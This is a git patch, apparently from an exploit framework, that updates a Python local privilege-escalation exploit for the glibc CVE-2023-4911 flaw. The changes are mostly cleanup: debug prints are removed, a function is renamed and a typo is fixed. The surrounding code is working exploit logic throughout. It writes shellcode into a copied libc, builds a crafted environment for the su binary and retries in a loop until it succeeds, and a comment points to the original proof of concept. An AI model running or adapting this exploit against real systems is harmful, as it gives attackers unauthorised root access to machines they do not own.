From 2ed3b771edd55f94710682be2debde2f4a55bf74 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Tue, 19 Dec 2023 00:26:54 -0500 Subject: [PATCH] Updated python exploit --- data/exploits/CVE-2023-4911/cve_2023_4911.py | 25 ++++---------------- 1 file changed, 4 insertions(+), 21 deletions(-) diff --git a/data/exploits/CVE-2023-4911/cve_2023_4911.py b/data/exploits/CVE-2023-4911/cve_2023_4911.py index 8a1737ddec..0148a6266e 100644 --- a/data/exploits/CVE-2023-4911/cve_2023_4911.py +++ b/data/exploits/CVE-2023-4911/cve_2023_4911.py @@ -57,6 +57,7 @@ TARGETS = { }, } +# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py BUILD_IDS = { "69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561, "3602eac894717d56555552c84fc6b0e4d6a4af72": 561, @@ -96,7 +97,7 @@ def parse_structured_data(structure_format, structure_keys, structure_data): return parsed_structure -def fetch_library_path(library_name): +def fetch_c_library_path(): class LoadedLibrary(Structure): _fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)] @@ -267,18 +268,14 @@ if __name__ == "__main__": architecture = os.uname().machine if architecture not in TARGETS.keys(): - error_and_exit("This target's architecturs '%s' is not supported by this exploit" % architecture) - - c_library_path = fetch_library_path("c") - - #print("Found libc = %s" % c_library_path.decode()) + error_and_exit("This target's architecture '%s' is not supported by this exploit" % architecture) + c_library_path = fetch_c_library_path() su_binary_path = which("su") memory_alignment = ((0x100 - (len(su_binary_path) + 1 + 8)) & 7) + 8 su_binary_elf = DelayedElfParser(su_binary_path) dynamic_linker_path = su_binary_elf.extract_section_by_name(".interp").strip(b"\x00").decode('utf-8') - #print("Dynamic linker path: ", dynamic_linker_path) dynamic_linker_elf = DelayedElfParser(dynamic_linker_path) dynamic_linker_build_id = binascii.hexlify( dynamic_linker_elf.extract_section_by_name(GNU_BUILD_ID)[-20:]).decode() @@ -292,18 +289,12 @@ if __name__ == "__main__": if libc_start_main == None: error_and_exit("The symbol in the libc ELF '__libc_start_main' could not be resolved.") - #print("__libc_start_main = 0x%x" % libc_start_main) - su_binary_offset = su_binary_elf.extract_section_header_by_name(".dynstr")["offset"] potential_path = find_path_before_null_character(su_binary_elf.data, su_binary_offset) if potential_path is None: error_and_exit("The potential path in the su_binary could not be found.") - #print("The potential path in the su binary was found.") - #print("Using path %s", potential_path["path"]) - #print("At offset %d", potential_path["offset"]) - if not os.path.exists(potential_path["path"]): os.mkdir(potential_path["path"]) @@ -311,7 +302,6 @@ if __name__ == "__main__": file_handle.write(libc_elf.data[0:libc_start_main]) file_handle.write(TARGETS[architecture]["shellcode"]) file_handle.write(libc_elf.data[libc_start_main + len(TARGETS[architecture]["shellcode"]):]) - #print("Patched up libc.so.6") stack_address = TARGETS[architecture]["stack_top"] - (1 << (TARGETS[architecture]["stack_aslr_bits"])) @@ -321,18 +311,11 @@ if __name__ == "__main__": if (stack_address >> (i * 8)) & 0xFF == 0: stack_address |= 0x10 << (i * 8) - #print("The stack address being used is: 0x%x" % stack_address) - environment = create_environment(BUILD_IDS[dynamic_linker_build_id], stack_address, potential_path["offset"], su_binary_elf.architecture) count = 1 - #print('Entering the true loop') argv = [b"su", b"--help", None] while True: - #if count % 0x10 == 0: - # sys.stdout.write(".") - # sys.stdout.flush() if execute_and_monitor(su_binary_path.encode(), argv, environment) == "Success": - #print("After %d tries: booya" % count) exit(0) count += 1